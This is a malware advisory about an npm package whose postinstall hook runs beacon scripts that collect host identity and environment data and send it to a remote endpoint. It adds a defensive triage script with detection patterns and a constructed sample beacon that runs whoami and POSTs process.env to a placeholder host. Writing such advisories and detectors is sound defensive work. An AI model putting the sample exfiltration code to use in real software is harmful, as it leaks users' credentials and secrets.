MAL-2026-5986
Malicious code in npm-sandbox-ping-r9t2 (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (335649d395a44d7de1bc6343dbce1f0459414ef92ab149413a86b47e28f3c7c3)

package.json declares a postinstall hook ("postinstall": "node run.js") that auto-executes on install. The package ships beacon scripts (beacon14.js, beacon_linux.js) that import child_process and http/os, run shell commands such as whoami, read process.env, process.platform, os.hostname(), os.platform(), and transmit the collected host/identity data via http.request GET/POST to a remote endpoint. The data flow (system enumeration -> outbound HTTP) and the install-time auto-execution together constitute a credential/host-info exfiltration beacon. Installer harm: any machine that runs `npm install npm-sandbox-ping-r9t2` will silently execute these beacons and leak local identity/environment information to a remote endpoint.
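A pre-install triage check for the pattern described above, as an added example (not code from this advisory or from Amazon Inspector): it flags a package that combines an install lifecycle hook with a script that enumerates the host or spawns commands and also makes outbound HTTP requests. The function name `triagePackage`, the regex heuristics, and the sample package contents are assumptions constructed for illustration.

```javascript
// Lifecycle hooks that npm runs automatically when a dependency is installed.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];
// Heuristic patterns (assumed for this example; not an exhaustive ruleset).
const EXEC = /require\(\s*['"](?:node:)?child_process['"]\s*\)|from\s+['"](?:node:)?child_process['"]/;
const NET = /require\(\s*['"](?:node:)?https?['"]\s*\)|from\s+['"](?:node:)?https?['"]/;
const HOST = /os\.hostname\(\)|os\.platform\(\)|process\.env|process\.platform|whoami/;

// files: map of relative path -> source text, read from the unpacked tarball.
function triagePackage(packageJsonText, files) {
  const scripts = JSON.parse(packageJsonText).scripts || {};
  const hooks = INSTALL_HOOKS.filter((h) => typeof scripts[h] === 'string')
    .map((h) => ({ hook: h, command: scripts[h] }));
  const beacons = [];
  for (const [path, src] of Object.entries(files)) {
    const hit = { path, exec: EXEC.test(src), net: NET.test(src), host: HOST.test(src) };
    // Host enumeration or command execution in a file that also talks HTTP
    // is the data flow the advisory describes.
    if (hit.net && (hit.exec || hit.host)) beacons.push(hit);
  }
  const verdict = hooks.length && beacons.length ? 'block'
    : hooks.length || beacons.length ? 'review' : 'pass';
  return { verdict, hooks, beacons };
}

// Constructed sample mirroring the advisory's description; the endpoint is a placeholder.
const samplePkg = JSON.stringify({
  name: 'example-pkg', version: '1.0.0',
  scripts: { postinstall: 'node run.js' },
});
const sampleFiles = {
  'run.js': "require('./beacon_linux.js');",
  'beacon_linux.js': [
    "const { execSync } = require('child_process');",
    "const http = require('http'); const os = require('os');",
    "const who = execSync('whoami').toString();",
    "http.request({ host: 'collector.example.invalid', method: 'POST' })",
    "  .end(JSON.stringify({ who, host: os.hostname(), env: process.env }));",
  ].join('\n'),
  'index.js': 'module.exports = () => 42;',
};

console.log(JSON.stringify(triagePackage(samplePkg, sampleFiles), null, 2));
```

Run a check like this against the extracted tarball before installation; installing with `npm install --ignore-scripts` prevents the postinstall hook from executing at all.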
Affected packages
No fixed version published yet for npm-sandbox-ping-r9t2 (npm). Pin to a known-safe version or switch to an alternative.